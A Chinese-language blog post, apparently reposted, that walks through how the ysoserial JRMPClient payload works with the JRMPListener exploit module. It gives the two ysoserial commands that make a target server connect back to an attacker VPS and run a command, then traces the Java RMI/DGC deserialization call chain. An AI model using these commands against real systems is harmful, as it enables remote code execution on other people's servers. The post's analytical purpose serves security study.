其他分享
首页 > 其他分享> > ysoserial payloads/JRMPClient

ysoserial payloads/JRMPClient

作者:互联网

ysoserial payloads/JRMPClient

环境:JDK8u102

payloads/JRMPClient可以配合exploit/JRMPListener模块来使用

1.在自己服务器上使用exploit/JRMPListener来开启监听

2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发送payload给对方服务器进行反序列化执行命令。

以下是执行ysoserial时候使用的命令:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1299 CommonsCollections7 "calc"

java -cp ysoserial.jar ysoserial.payloads.JRMPClient "vpsIP:PORT"

调试分析:

设置payloads/JRMPClient和exploit/JRMPListener的启动参数

image-20210727091108457 image-20210727091221264

JRMPClient的payload构造是在getObject方法中

image-20210727093647412

前面几行是构造了反向连接所需要的一些对象,然后把ref传入了RemoteObjectInvocationHandler中,之后进行了一个动态代理,最后返回了proxy对象。

服务端那边就会把这个proxy进行反序列化,从而执行调用链进行反向连接。

这里有个知识点:

proxy的反序列化其实就是调用其InvocationHandler的readObject方法,而这里的InvocationHandler则是RemoteObjectInvocationHandler。

RemoteObjectInvocationHandler的readObject方法是调用其父类RemoteObject的readObject方法

image-20210727094913772

进行了if判断,进入到了else中,然后执行了ref.readExternal(in);

image-20210727095643706

这里的ref为UnicastRef,跟进UnicastRef#readExternal

image-20210727095955626

继续跟进LiveRef#read

image-20210727100136521

调用了DGCClient#registerRefs

image-20210727100929168

这里进行了一个do...while,首先DGCClient$EndpointEntry.lookup方法,然后调用了var2.registerRefs(var1)

DGCClient#registerRefs

先看DGCClient$EndpointEntry.lookup方法

跟进DGCClient$EndpointEntry.lookup方法,看到调用了DGCClient#EndpointEntry方法

image-20210727101131218

在DGCClient#EndpointEntry方法中,使用TCPEndpoint和DgcID创建了LiveRef对象,之后生成了DGCImpl_Stub代理对象( 其实payloads/JRMPClient也是通过DGC通信,进而反序列化恶意payload的)

image-20210727103334544

最后开启了与JRMPListener的Socket通信

DGCClient$EndpointEntry#registerRefs

回到前面的var2.registerRefs(var1)

这里的var2其实就是DGCClient$EndpointEntry

image-20210727105523047

跟进DGCClient#registerRefs,在最后调用了DGCClient$EndpointEntry的makeDirtyCall方法

image-20210727110519984

跟进makeDirtyCall方法,到205行,调用了DGCImpl_Stub#dirty

image-20210727110740754

跟进DGCImpl_Stub#dirty(这里有个问题,这个DGCImpl_Stub其实是动态生成的类,无法调试,所以只能进源码直接看)

image-20210727111055492

newCall是和 JRMPListener建立连接,write写入序列化数据,invoke用来处理服务端的数据,最后readObject来反序列化(前提是传过来的数据不是一个异常类)

标签:ysoserial,JRMPClient,payloads,EndpointEntry,序列化,DGCClient
来源: https://www.cnblogs.com/yyhuni/p/15069427.html